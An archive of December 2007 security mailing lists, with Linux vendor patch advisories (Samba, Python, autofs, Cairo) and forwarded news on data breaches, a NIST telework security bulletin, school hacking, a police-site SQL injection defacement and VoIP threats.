--------------------------------------------------- Updated Red Hat Enterprise Linux 4 Technology Preview autofs5 packages are now available to fix a security flaw. There was a security issue with the default installed configuration of autofs version 5 whereby the entry for the "hosts" map did not specify the "nosuid" mount option. A local user with control of a remote nfs server could create a setuid root executable within an exported filesystem on the remote nfs server that, if mounted using the default hosts map, would allow the user to gain root privileges. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/132140 * RedHat: Critical: samba security update (Dec 10) ------------------------------------------------ Updated samba packages that fix a security issue are now available for Red Hat Enterprise Linux 4.5 Extended Update Support.A stack buffer overflow flaw was found in the way Samba authenticates remote users. A remote unauthenticated user could trigger this flaw to cause the Samba server to crash, or execute arbitrary code with the permissions of the Samba server. This update has been rated as having critical security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/132043 * RedHat: Moderate: python security update (Dec 10) ------------------------------------------------- Updated python packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.An integer overflow flaw was discovered in the way Python's pcre module handled certain regular expressions. If a Python application used the pcre module to compile and execute untrusted regular expressions, it may be possible to cause the application to crash, or allow arbitrary code execution with the privileges of the Python interpreter. This update has been rated as having moderate security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/132044 * RedHat: Moderate: python security update (Dec 10) ------------------------------------------------- Updated python packages that fix several security issues are now available for Red Hat Enterprise Linux 2.1. An integer overflow flaw was discovered in the way Python's pcre module handled certain regular expressions. If a Python application used the pcre module to compile and execute untrusted regular expressions, it may be possible to cause the application to crash, or allow arbitrary code execution with the privileges of the Python interpreter. This update has been rated as having moderate security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/132041 * RedHat: Critical: samba security and bug fix update (Dec 10) ------------------------------------------------------------ Updated samba packages that fix a security issue and a bug are now available for Red Hat Enterprise Linux. A stack buffer overflow flaw was found in the way Samba authenticates remote users. A remote unauthenticated user could trigger this flaw to cause the Samba server to crash, or execute arbitrary code with the permissions of the Samba server. This update has been rated as having critical security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/132042 -------------------------------------------------------------------------- * SuSE: samba (SUSE-SA:2007:068) (Dec 12) --------------------------------------- The Samba suite is an open-source implementatin of the SMB protocol. This update of samba fixes a buffer overflow in function send_mailslot() that allows remote attackers to overwrite the stack with 0 (via memset(3)) by sending specially crafted SAMLOGON packets. http://www.linuxsecurity.com/content/view/132137 -------------------------------------------------------------------------- * Ubuntu: Cairo regression (Dec 12) ---------------------------------- USN-550-1 fixed vulnerabilities in Cairo. A bug in font glyph rendering was uncovered as a result of the new memory allocation routines. In certain situations, fonts containing characters with no width or height would not render any more. This update fixes the problem. We apologize for the inconvenience. http://www.linuxsecurity.com/content/view/132198 * Ubuntu: Cairo regression (Dec 10) ---------------------------------- Peter Valchev discovered that Cairo did not correctly decode PNG image data. By tricking a user or automated system into processing a specially crafted PNG with Cairo, a remote attacker could execute arbitrary code with user privileges. http://www.linuxsecurity.com/content/view/132046 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From alerts at infosecnews.org Tue Dec 18 00:02:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Business data exposed on Canada Post website Message-ID: http://www.theglobeandmail.com/servlet/story/RTGAM.20071217.wbreach17/BNStory/National/home By Kenyon Wallace The Globe and Mail December 17, 2007 Login records for scores of small businesses that use Canada Post's business shipping website are available online as a result of a Web server glitch, leaving sensitive information such as names, addresses and shipping details vulnerable. A Vancouver small business owner discovered the security breach last week while conducting a Yahoo search of his company name. The first link generated by Yahoo contained his username and password for Canada Post's Sell Online website. Only the letters "CPC" that are required to come before all usernames were missing. The man then discovered that by simply changing the date in his Web browser address bar, he could access dozens of websites with other login records that disclosed usernames and attempts to enter passwords on the Sell Online website. "I was absolutely shocked," said the man who spoke to the Globe and Mail on the condition of anonymity. "This information simply should not be in the public domain. Anyone with my password could have accessed customer shipping details and my Visa card number, which is attached to the website." Franois Legault, a spokesman for Canada Post, could not specify the root cause of the security breach, but said the federal agency believes the available "out of date" usernames and passwords pose no threat to its customers. Mr. Legault said the federal agency - which farms out all of its IT services to third parties such as Innovapost and IBM - had addressed the problem. But a Yahoo search of cached websites Friday revealed more Sell Online usernames and login attempts. "Obviously, we unfortunately won't be able to find and eliminate all the cached daily files, but over time they will expire and we're confident there's no risk that someone can use this information to steal identities," Mr. Legault said. But an Internet law specialist said that even though the data made available by Canada Post show failed login attempts - incorrect combinations of usernames and passwords - this kind of information is a potential "gold mine" for those engaged in identity theft and Internet fraud. "People typically use the same username and the same password across multiple websites," said Michael Geist, a law professor at the University of Ottawa. "If you're a fraudster, you could use the information from the Canada Post records to try to crack into someone else's online banking or e-mail accounts. You'd be surprised the number of times you'd be successful." Sell Online allows business owners to set up online stores for products, provide shipping quotes, and enable customers to use virtual shopping carts. Many mail-order businesses link their websites with the Sell Online website to automatically calculate shipping costs and determine packaging dimensions. Karin Bull, owner of Biopaw, a Pickering, Ont.-based mail-order business dealing in natural pet food, recently opened an account with Sell Online. Ms. Bull said she was "devastated" when contacted by the Globe and Mail and presented with her passwords that were gleaned from the Internet. "These are passwords I use for other online applications like e-mail and banking," Ms. Bull said. "I'm definitely going to think twice about repeated attempts to login anywhere online again." Scott Smith, president of NoFenders.com, a Simcoe, Ont.-based Formula One Racing merchandise retailer, said he couldn't believe his username and password were already online, especially since he had created his shipping profile only last Thursday. "That's pretty scary," he said. "You really could ruin someone's business by logging in and changing all their shipping numbers." The Canada Post security breach comes just two weeks after a massive privacy flaw was discovered on the website of another federal agency. In late November, a Huntsville, Ont., man was able to access social insurance numbers, birthdates and driver's licence numbers of those applying for new passports on the Passport Canada website. "Unfortunately, this kind of thing happens all the time," said Ian Goldberg, an Internet security expert at the University of Waterloo. In the case of Sell Online, it appears that a folder with client login attempts was inadvertently placed in a public area of the Web server, Prof. Goldberg said. "This is clearly not malicious," he said. "Canada Post isn't a security company, it's a post office. They just made a mistake." From alerts at infosecnews.org Tue Dec 18 00:02:45 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] ITL Bulletin for December 2007 Message-ID: Forwarded from: Elizabeth Lennon ITL BULLETIN FOR DECEMBER 2007 SECURING EXTERNAL COMPUTERS AND OTHER DEVICES USED BY TELEWORKERS Shirley Radack, Editor Computer Security Division Information Technology Laboratory National Institute of Standards and Technology U.S. Department of Commerce Many workers highly value the arrangements that they have with their employers to work from home or from other locations away from their organizations' facilities. This popular practice of teleworking, or telecommuting, benefits both the organizations and their staff members, who are able to read and send email, access Web sites, review and edit documents, and perform many other tasks from remote sites. These teleworkers use devices such as desktop and laptop computers, personal digital assistants (PDAs), and cell phones to access their organization's nonpublic computing resources and to conduct business from them when they are at home or traveling. For many years, teleworkers were limited in their activities because their dial-up modems, which were the primary communications mechanism for remote access, operated at slow speeds. Today high-speed Internet connectivity and broadband communications provide fast data transfer rates, greatly expanding the productive use of remote access capabilities by teleworkers. But with increasing intruder attacks and other threats in today's computing environment, teleworkers and their organizations are challenged to plan carefully to protect the security of telework devices, networks, and information resources. User's Guide to Securing External Devices for Telework and Remote Access The Information Technology Laboratory of the National Institute of Standards and Technology (NIST) has issued a new guide that provides practical advice to help workers secure their external devices that they need for teleworking. NIST Special Publication (SP) 800-114, User's Guide to Securing External Devices for Telework and Remote Access: Recommendations of the National Institute of Standards and Technology, written by Karen Scarfone and Murugiah Souppaya, focuses on the security of the teleworker's computing devices and recommends steps to protect the devices, the computer operating systems (OSs) and applications, and the home networks that the computers use. The guide provides an overview of telework technologies and the security issues related to the use of telework devices. The basic issues of securing information and home networks, and of using external networks, are discussed. Recommendations to users cover protecting their devices, computer operating systems and applications, and for protecting the information stored on telework computers and removable media. Advice is provided for protecting the wireless home networks that are used for remote access communications. A section of NIST SP 800-114 focuses on protecting cell phones, PDAs, and smart phones, such as hybrid cell phone/PDA devices (for example, BlackBerry and Windows Mobile devices). Another section guides teleworkers in the safe use of devices that are secured by a third party, such as a computer provided for public use at a conference or hotel. The publication's useful appendices present supplemental information and supporting material, including security-related considerations for telework, such as using cellular phones and Voice over Internet Protocol (VoIP) phone services; using wireless personal area network (WPAN) technologies such as Bluetooth; using wireless broadband data cards; and ensuring the secure destruction of removable media and printed materials that might contain sensitive information. Also included in the appendices are a glossary, a list of acronyms and abbreviations, and a list of in-print resources and online tools and resources that users may wish to consult for additional information about securing their telework devices. NIST SP 800-114 is available at NIST's Web site at http://csrc.nist.gov/publications/nistpubs/800-114/SP800-114.pdf. Security of Telework Devices: A Challenge for Workers and Their Organizations Both personal computers and consumer devices are used for telework, and different ownership arrangements apply to the devices. Personal computers (PCs) are desktop and laptop computers that run standard PC OSs (e.g., Windows, Linux/UNIX, Mac OS). These devices gain access to broadband networks through cable modems, digital subscriber lines, satellite, and wireless connections. Consumer devices are small, usually mobile, computers that do not run standard PC OSs. Examples are networking-capable PDAs, cell phones, and video game systems. Consumer devices are most often used for remote access applications that use Web browsers, primarily Secure Sockets Layer (SSL) Virtual Private Networks (VPNs) and individual Web application access. Telework devices may be owned, configured, and managed by the worker's organization and can be used for any of the organization's access methods. Some teleworker devices are owned by the worker, who is responsible for securing them and maintaining their security. Another arrangement is the devices that are owned, configured, and secured by third parties, such as kiosk computers at hotels, and PCs or consumer devices owned by friends and family of the worker. Remote access options for third party-secured devices are usually limited because users are often unable to install software onto them, such as VPN software, terminal server software, and Web browser plug-ins. Because of their security policies and technology limitations, organizations often limit the types of devices that can be used for remote access. An organization might require the worker to use only the organization's PCs. Some organizations have tiered access levels, such as allowing the organization's PCs to access many resources, teleworker-owned PCs to access a more limited set of resources, and consumer devices and third-party PCs to access only one or two resources, such as Web-based email. This allows an organization to limit the risk it incurs by permitting the most controlled devices to have the most access and the least controlled devices to have minimal access. Before they use their own or third-party computers for remote access to their organization's resources, teleworkers should check to confirm that the organization's latest policies allow such access. There are risks associated with remote access to information resources in general, and broadband communications, if not properly protected, can be especially vulnerable to intruder attacks. When a telework device uses remote access, it is essentially a logical extension of the organization's own network. Therefore, if the telework device is not secured properly, it poses additional risk not only to the information that the teleworker accesses but also to the organization's other systems and networks. For example, a telework device infected with a worm could spread the worm through remote access to the organization's internal computers. Therefore, telework devices should be secured properly and have their security maintained regularly. Many organizations automatically check the security health of each telework device that attempts to use remote access to the organization's information resources to ensure that the device complies with the organization's policies. Examples of the checks that an organization might conduct are verifying that the OS is fully patched, that antivirus software is installed and up-to-date, and that a personal firewall is enabled. The organization can also check if the device has been secured by the organization and whether the device is a desktop or laptop computer, a PDA, a video game system, or other device. Based on the results of these checks, the organization can determine whether the device should be permitted to use remote access. With good planning and careful implementation of sensible guidelines, organizations can support the popular practice of telecommuting, while protecting their networks and information resources. Threats to External Devices People who want to cause mischief, disrupt organizational operations, and commit fraud are a major threat to the security of external devices used by teleworkers. Telework devices are susceptible to the insertion of malware, also known as malicious code. Malware is a computer program that is covertly placed onto a computing device with the intent of compromising the confidentiality, integrity, or availability of the device's data, applications, or OS. Common types of malware threats include viruses, worms, malicious mobile code, Trojan horses, rootkits, and spyware. Malware threats can infect devices through email, Web sites, file downloads and file sharing, peer-to-peer software, and instant messaging. Another common threat for telework devices is the loss or theft of the device. Someone with physical access to a device has many options for attempting to view the information stored on it. Teleworkers can increase the security of their devices by adopting security protections, or security controls. These measures taken against the threats compensate for the device's security weaknesses, or vulnerabilities. Some vulnerabilities can be eliminated through security protections. For example, the user can enable a feature in an application to automatically download and install new versions of the application to correct previous errors. Some vulnerabilities cannot be eliminated, but security protections can prevent attacks. For example, antivirus software can stop an infected email from being opened by a user, or hard drive encryption can make files unreadable by others. However, not all vulnerabilities can be eliminated. The complexity of computing and remote access makes total protection of information resources almost impossible. But organizations can realize a more realistic goal of applying security protections to give attackers as few opportunities as feasible to gain access to a device or to damage the device's software or information. NIST Recommendations Teleworkers should take an important first step before implementing any of the recommendations or suggestions in the guide. They should back up all of their data and verify the validity of the backups. Users with limited experience in configuring personal computers, consumer devices, or home networks should seek expert assistance in applying the guide's recommendations to avoid any potential losses of data, device, or application functionality. NIST recommends that teleworkers take the following steps to improve and maintain the security of their external telework devices: * Become thoroughly familiar with their organization's policies and requirements, and know how to protect the organization's information that they may access. Sensitive information that is stored on or sent to or from external telework devices must be protected. It is important to prevent malicious parties from accessing or altering information. An unauthorized release of sensitive information could damage the public's trust in the organization, jeopardize the mission of the organization, or harm the individuals whose personal information is compromised. Many methods can be employed to protect the personal information that is accessed during teleworking, including protecting the physical security of telework devices, encrypting files stored on devices, and ensuring that information stored on devices is backed up. * Ensure that all the telework devices used on wired and wireless home networks are properly secured, and that home networks are protected also. Appropriate security measures should be applied to the PCs and consumer devices that use the same wired and wireless home networks to which the telework device normally connects. If these other devices become infected with malware or are otherwise compromised, they could attack the telework device or eavesdrop on its communications. Teleworkers should also be cautious about allowing others to place devices on the teleworkers' home networks, in case one of these devices is compromised. Teleworkers should also apply security measures to the home networks to which their telework devices normally connect. One example of such a security measure is to use a broadband router or firewall appliance to prevent computers outside the home network from initiating communications with telework devices on the home network. Another example is to ensure that sensitive information transmitted over a wireless home network is adequately protected through strong encryption. * Secure the operating systems and primary applications of desktop or laptop PCs that the teleworker owns and uses for telework. Securing a telework PC includes the following actions: -- Use a combination of security software, such as antivirus and antispyware software, personal firewalls, spam and Web content filtering, and popup blocking, to stop most attacks, particularly malware. -- Restrict who can use the PC by having a separate standard user account for each person; assign a password to each user account; use the standard user accounts for daily use; and protect user sessions from unauthorized physical access. -- Ensure that updates are regularly applied to the operating system and primary applications, such as Web browsers, email clients, instant messaging clients, and security software. -- Disable unneeded networking features on the PC and configure wireless networking securely. -- Configure primary applications to filter content and stop other activity that is likely to be malicious. -- Install and use only known and trusted software. -- Configure remote access software based on the organization's requirements and recommendations. -- Maintain the security of the PC on an ongoing basis, such as changing passwords regularly and checking the status of security software periodically. * Secure the consumer devices that the teleworker owns and uses for telework, based on the security recommendations of the devices' manufacturers. A wide variety of consumer devices exists, and security features available for these devices also vary widely. While some devices offer only a few basic features, others offer sophisticated features similar to those offered by PCs. Devices with less sophisticated features are not necessarily less secure than those with many more security features. Many devices offer more security features because the capabilities that they provide, such as access to wireless networking and capabilities for instant messaging, make them more susceptible to attack than devices without these capabilities. General recommendations for securing telework devices are: -- Limit access to the device, such as setting a personal identification number (PIN) or password and automatically locking a device after an idle period. -- Disable networking capabilities, such as Bluetooth, except when they are needed. -- Use additional security software, such as antivirus software and personal firewalls, if appropriate. -- Ensure that security updates, if available, are acquired and installed at least monthly, preferably weekly. -- Configure applications to support security, such as blocking activity that is likely to be malicious. * Consider the security state of a third-party device before using it for telework. Teleworkers often want to perform remote access to their organization's network from third-party devices. They may want to check their email from a kiosk computer at a conference, for example. However, they may not know if such devices have been secured properly or if they have been compromised. Consequently, a teleworker could use a third-party device infected with malware that steals information from users (e.g., passwords or email messages). Many organizations either forbid third-party devices to be used for remote access or permit only limited use, such as for Web-based email. Teleworkers should consider who is responsible for securing a third-party device and who can access the device before deciding whether or not to use it. Whenever possible, teleworkers should not use publicly accessible third-party devices for telework, and teleworkers should avoid using any third-party devices for performing sensitive functions or accessing sensitive information. More Information NIST SP 800-114 was originally issued for public comment as an update to NIST SP 800-46, Security for Telecommuting and Broadband Communications. However, as the scope of NIST SP 800-114 evolved, NIST decided to issue it as a supplement to SP 800-46, rather than as a replacement. NIST SP 800-114, NIST SP 800-46 and other NIST publications assist organizations in planning and implementing a comprehensive approach to information security. For information about NIST standards and guidelines that are referenced in the security guide for teleworker devices, as well as other security-related publications, see NIST's Web page at http://csrc.nist.gov/publications/index.html. For information about standards and guidance for protecting information, communications, and operations through the application of cryptographic security techniques, see http://csrc.nist.gov/groups/ST/toolkit/index.html. Many manufacturers document their security recommendations in their product documentation or on their Web sites. Some manufacturers also make security checklists available for securing their operating systems, applications, and devices. Many of these checklists are posted on the NIST Security Checklists for IT Products site, located at http://csrc.nist.gov/checklists/. Disclaimer Any mention of commercial products or reference to commercial organizations is for information only; it does not imply recommendation or endorsement by NIST nor does it imply that the products mentioned are necessarily the best available for the purpose. Elizabeth B. Lennon Writer/Editor Information Technology Laboratory National Institute of Standards and Technology 100 Bureau Drive, Stop 8900 Gaithersburg, MD 20899-8900 Telephone (301) 975-2832 Fax (301) 975-2378 From alerts at infosecnews.org Tue Dec 18 00:03:03 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] 'Sensitive' security data is lost Message-ID: http://www.telegraph.co.uk/news/main.jhtml?view=DETAILS&grid=&xml=/news/2007/12/17/npols517.xml By James Kirkup The Telegraph 17/12/2007 Electronic details of the new security system protecting Parliament have been lost, sparking a Commons security alert. The Daily Telegraph understands that a laptop containing sensitive information about the new Westminster access system disappeared last Wednesday night. The computer belonged to a senior parliamentary official believed to work in the Serjeant at Arms department responsible for the security of MPs and the Palace of Westminster. Compounding the embarrassment of the security officials, the laptop is said to have been stolen within the parliamentary estate. "It is password protected, but there is stuff on there about access control, so it is sensitive," said a parliamentary official. "It is not the sort of stuff you want floating around out there." A spokesman for the House of Commons declined to comment on the missing laptop, insisting that the parliamentary authorities never discussed security issues. Security at Parliament has been radically stepped up since two groups - Fathers 4 Justice and pro-hunting campaigners - breached Commons security in 2004. Security officials say the greatest fears surround the possibility that terrorists could obtain a Westminster security pass and gain access to some of the most sensitive locations in the UK. From the New Year, a new, enhanced security pass system is being introduced that is meant to render a stolen pass useless. From alerts at infosecnews.org Tue Dec 18 00:03:23 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Insurer gets record fine for ID theft disaster Message-ID: http://www.techworld.com/security/news/index.cfm?newsID=10952 By John E. Dunn Techworld 17 December 2007 A UK insurance house has been slapped with a record fine by the Financial Services Authority (FSA) watchdog for incompetent customer account security. The latest offender is Norwich Union, which allowed fraudsters to impersonate customers when phoning its call centres, cashing in policies on an astonishing 74 occasions out of a total of recorded 632 attempts. The criminals 11 suspects have now been arrested were able to steal a total of 3.3 million during the scam, which took place in 2006. The FSA has hit the company with a 1.26 ($2.6 million) million fine, a record for the UK, and even larger than that levied on The Nationwide Building Society earlier this year for losing a laptop full of unspecified customer data in August 2006. The Norwich Union only avoided an even larger fine of 1.8 million ($3.6 million) by promptly settling the charges with the industry regulator, and agreeing to tighten up its procedures. One of the most serious charges was that the company failed to react to the pattern of fraud, allegedly initially only informing customers who had been or were current directors of the company. In other words, the company realised fraud was happening but was unable to put in place extra security to stop further occurrences of fraud from happening. "Norwich Union Life let down its customers by not taking reasonable steps to keep their personal and financial information safe and secure, said the FSAs Margaret Cole. "It is vital that firms have robust systems and controls in place to make sure that customers' details do not fall into the wrong hands. Firms must also frequently review their controls to tackle the growing threat of identity theft."This fine is a clear message that the FSA takes information security seriously and requires that firms do so too," she added. The Norwich Union for its part claims to have tightened up its procedures, which appear to have been compromised by the ease with which criminals were able to use data taken from a variety of public sources to impersonate policy holders. "We are sorry that this situation arose and apologised to the affected customers when this happened.", Mark Hodges, Norwich Union Life chief was reported to have said. "We have extensive procedures in place to protect our customers but in this instance weaknesses were exploited and we were the target of organised fraud," he said using a degree of understatement. The Norwich Union since has refunded stolen money and reinstated the hacked policies. From alerts at infosecnews.org Tue Dec 18 00:04:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Students charged with hacking JCPS computer system Message-ID: http://www.wave3.com/Global/story.asp?S=7509176 By Scott Harvey WAVE 3 TV December 17, 2007 Louisville - Two local high school students and a former student are in trouble after authorities say they hacked into the school's computer system. It happened back in October at Manual High School. In a story you will read only on wave3.com, Investigator Scott Harvey explains the students were doing more than just changing grades. School officials say they were smart kids, doing smart things. "We are trying to determine how they did it," said Cary Petersen, JCPS's executive director of Information Technology. "What was the damage they did? And trying to correct everything as quickly as possible. The two seniors and one former student could face some stiff penalties for breaking into the JCPS computer system. School officials tell WAVE 3 News they don't know how long the students had been altering grades and attendance records, but eventually that's what got them caught. "The attendance clerk at the school noticed what she had put in from one day was missing from the next," Petersen said. School officials say they didn't stop with just the illegal extra credit. "They created their own website," Petersen explained. He said the alleged hackers also broke into individual teacher's computers and created a website -- www.ilovekeepers.com. The site is named after Manual's principal, Dr. Beverly Keepers. Officials say the group posted tests and quizzes, along with the answers that went with them. We checked the website. Now when you log on it simply says, "If you are looking for the infamous site everyone is talking about -- sorry. Check back later for more appropriate content." Petersen also told me the students worked at a computer parts store, which gave them access to equipment that students don't normally have. "We believe there was a device that was put on the system itself," he explained. "It allowed them to get in the door. Once they got in the door, it was ollie ollie oxen free. They could go anywhere they wanted to." But school officials don't have the answer they really want -- why they did it. "I think it was, for more or less, for show," Petersen said. "You know, 'look what I can do.'" According to the JCPS Code of Conduct, the students have been suspended with a recommendation for alternative placement. If the school decides to press charges and if convicted, school officials say the students could face jail time. Petersen says the students are now working with school computer technicians to help improve the website's security. All content Copyright 2000 - 2007 WorldNow and WAVE From alerts at infosecnews.org Wed Dec 19 00:27:03 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Police Web site back after hacker hits media database Message-ID: http://www.tucsoncitizen.com/daily/local/71839.php By Renee Schafer Horton Tucson Citizen 12.18.2007 The Tucson Police Department's Web site will be coming back online within the next 48 hours, Pat Johnson, TPD webmaster, said. The Web site went down about two weeks ago after a man calling himself "Hmei7" hacked into it, Johnson said. There was no danger to police data files during this time, Johnson explained, because Hmei7 hit only the media release database. Johnson said Hmei7 is from Indonesia and has hacked into hundreds of government Web sites internationally. He said Hmei7 doesn't qualify as a professional hacker, because he doesn't seek to do permanent damage to a site, but rather cause a nuisance. "I'd call him a professional prankster," Johnson said. Using a technique called "SQL injection," which is pronounced "sequel injection," Hmei7 got into the TPD media release site and programmed a change into the search box. "On our media site, we have a search box for the media releases," Johnson said. "SQL injection allows someone to type 'Mr. Jones' and a SQL statement and that changed all the titles of all the media releases to read, 'Hmei7 has touched your soul.' " TPD was notified of the problem by someone trying to view the Web site, and TPD immediately shut the site down, Johnson said. Hmei7 was able to insert the SQL injection code by getting past the city of Tucson firewall and the TPD firewalls, Johnson said. Sgt. Mark Robinson said TPD information technology has been working the past two weeks to identify how Hmei7 gained access and to install security measures to prevent SQL injections from being used again. From alerts at infosecnews.org Wed Dec 19 00:27:14 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Students charged with hacking JCPS computer system Message-ID: Forwarded from: Jason Scott Wow, this one takes me back. It harkens back to a top quality 1983-era "holy crap, the children are coming at us like technozombies" sensational piece worthy of a weekly. On Tue, 18 Dec 2007, InfoSec News wrote: > http://www.wave3.com/Global/story.asp?S=7509176 > > By Scott Harvey > WAVE 3 TV > December 17, 2007 > > Louisville - Two local high school students and a former student are > in trouble after authorities say they hacked into the school's > computer system. It happened back in October at Manual High School. In > a story you will read only on wave3.com, Investigator Scott Harvey > explains the students were doing more than just changing grades. > > School officials say they were smart kids, doing smart things. From alerts at infosecnews.org Wed Dec 19 00:27:29 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] TJX, banks reach settlement in data breach Message-ID: http://www.boston.com/business/articles/2007/12/18/tjx_banks_reach_settlement_in_data_breach/ By Ross Kerber Globe Staff December 18, 2007 TJX Cos. and New England banks said today they have agreed to settle a high-profile lawsuit over payment card security practices in the wake of the record-setting data breach at the Framingham retailer that compromised as many as 100 million accounts. TJX, the parent of discount retail chains including T.J. Maxx and Marshalls, will pay community banks and trade groups in Massachusetts, Connecticut, and Maine a portion of their legal expenses. More specifics weren't disclosed, but the deal won't add to the $256 million in total spending TJX previously had budgeted to deal with the breach, a spokeswoman said today. In addition to settling with the banks, the figure is meant to cover previous settlements with payment card company Visa International Inc. for up to $40.9 million in costs, and with a class of consumers. TJX still faces claims from an Alabama bank and investigations by federal and state officials over the breach. But Mary Monahan, partner of Javelin Strategy & Research in California, said the deal amounts to a relative win for TJX and one that was no surprise after a decision by a federal district court judge made it harder for the banks to join together to sue TJX as a class. "Once that happened, it became too expensive for the banks to continue on this route," she said. Both sides said they were pleased with the outcome. Banks led by the Massachusetts Bankers Association had filed their suit in the spring as the extent of the data breach became clear, seeking to cover costs such as reissuing compromised cards. TJX found illicit software on its systems at the end of last year, and Canadian privacy officials later tied the intrusion to a weakness in the company's wireless security systems dating back as far as 2005. Although officials have won convictions against individuals in Florida and elsewhere for misusing the stolen card numbers to buy goods, to date no individual has been charged with the intrusion itself. The bankers alleged that TJX was negligent in not maintaining stricter data security, and unearthed various documents that showed the company wasn't meeting industry security standards and had caused Visa to issue fines. TJX had fought back, however, arguing its security was similar to other retailers and noting that only recently have a majority of large merchants met payment card security rules. As part of today's deal, the bankers are recommending their members accept the repayments Visa is offering under the terms of its deal with TJX. In statements today both sides said they hope the deal with improve overall security. "The TJX experience underscores broader challenges facing the US payment card system that require urgent action," said Carol Meyrowitz, TJX chief executive, in a statement. Daniel Forte, president of the Massachusetts Bankers Association, said the case was worth pursuing to show weaknesses in the payment system. "This data breach and the ensuing litigation have clearly initiated an important nationwide dialogue on the importance of improving the security of the US payment card system," he said. Copyright 2007 Globe Newspaper Company. From alerts at infosecnews.org Wed Dec 19 00:27:42 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Data breach officials could be sent to the big house Message-ID: http://www.theregister.co.uk/2007/12/18/hmrc_crim_penalties/ By Joe Fay The Register 18th December 2007 Civil servants responsible for the loss of public data could face prison sentences in future, instead of a brief period in sackcloth and ashes before being shifted into a consultancy role. In his update on the HMRC data loss to MPs yesterday, Alistair Darling said: "There will now also be new sanctions under the Data Protection Act for the most serious breaches of its principles. "These will take account of the need not only to provide high levels of data security but also to ensure that sensible data sharing practices can be conducted with legal certainty. We will consult early in the New Year on how this can best be done." The Times reports that ministers have accepted that the penalties for "gross failures" to protect citizens' details should include criminal penalties. These could be as harsh as a two year prison sentence for the most serious offenses. Darling, yesterday, also said that spot check powers introduced in Whitehall in the wake of the HMRC data loss would be extended right across the public sector. In the wake of the recent HMRC debacle, the head of department resigned, but swiftly reappeared doing work for the cabinet office. Meanwhile, the government pointed the finger at a junior official they said had ignored procedures to download the data onto a disk. It subsequently emerged that senior officials had been involved in the decision to just plonk the entire benefits database onto a couple of CDs before popping it into the internal mail. This weekend it emerged that the exact procedures for protecting data were only detailed in a manual that was restricted to senior civil servants. Of course, the issue is not whether the penalties are introduced, but whether they are enforced and used. Plausible deniability is a Whitehall watchword and there's nothing more plausible than denying all knowledge and/or blaming outside contractors. Except perhaps ensuring that the relevant watchdogs are fed a paltry and bromide heavy diet. Information Commissioner Richard Thomas was presumably looking to head off just such a situation yesterday when as well as expressing his "welcome" for the Chancellor's plans, he declared: "It goes without saying that it is essential that the ICO is properly resourced to discharge any new responsibilities effectively." The Foundation for Information Policy Research was less positive, saying that Darling's response, and that of Ruth Kelly on the loss of three million driving test candidate IDs, showed the government still didn't understand the nature of the problem. "Their refusal to abandon the headlong rush towards Transformational Government - the enormous centralised databases being built to regulate every walk of life - is not just pig-headed but profoundly mistaken," it said. "Before Transformational Government came along, only small amounts of data were lost - but as the new databases cover the whole population, everyone's affected now, not just a few unlucky people," it continued. Ross Anderson, chair of FIPR and Professor of Security Engineering at the University of Cambridge called instead for localised databases, to limit the damage from any leaks. "You can have security, or functionality, or scale - you can even have any two of these. But you can't have all three, and the Government will eventually be forced to admit this. In the meantime, billions of pounds are being wasted on gigantic systems projects that usually don't work, and that place citizens' privacy and safety at risk when they do," he said. Oh, and the BBC reports that details of 6,500 people belonging to a pension firm have been lost at an HMRC office in Wales. The data includes names, addresses, NI numbers, and pension details. From alerts at infosecnews.org Wed Dec 19 00:27:54 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] VoIP vulnerabilities increasing, but not exploits Message-ID: http://www.networkworld.com/news/2007/121707-crystal-ball-voip-vulnerabilities.html By Tim Greene Network World 12/17/07 The threats against VoIP are numerous and seem to be growing, but in 2008 the technology probably won't suffer crippling attacks. The potential danger is very real. VoIP is susceptible to the many exploits that networks generally are heir to -- denial of service, buffer overflows and more. VoIP PBXs are servers on corporate networks and are only as secure as the networks themselves. In addition, there are many voice-specific attacks and threats. These have been chronicled by researchers and vendors intending to alert users and suggest ways to guard against them. For instance, two protocols widely used in VoIP -- H.323 and Inter Asterisk eXchange -- have been shown to be vulnerable to sniffing during authentication, which can reveal passwords that later can be used to compromise the voice network. Implementations of Session Initiation Protocol (SIP), an alternative VoIP protocol, can leave VoIP networks open to unauthorized transport of data. In addition, tools that can help find vulnerable deployments have been published online by a VoIPSA, an industry group dedicated to securing VoIP. The VoIPSA tools are intended to help businesses test and secure their networks, but these and other online tools can be used to probe for weaknesses as well. Still, there have been few exploits so far and none that have been widespread or crippling to businesses. "We are not hearing about attacks. We dont think they are happening," says Lawrence Orans, an analyst with Gartner. Part of the reason may be that the largest VoIP vendors use proprietary protocols, such as Cisco's Skinny, Nortel's Unistim and Avaya's variant of H.323, Orans says. That makes them difficult to obtain and study for potential security cracks. "These systems are not readily available to the bad guys," he says. SIP, which is gaining popularity, is a mixed bag, Orans says, because it is readily available to those who might want to exploit it. "I would say that SIP is a good-news, bad-news story. It's easy to get your hands on, and that includes the bad guys. The good news is there are more options to protect SIP," he says. These options include firewalls and intrusion-prevention systems that support SIP (compare products). Another reason for the lack of broad exploits is that there isnt enough ROI for attackers' development time. 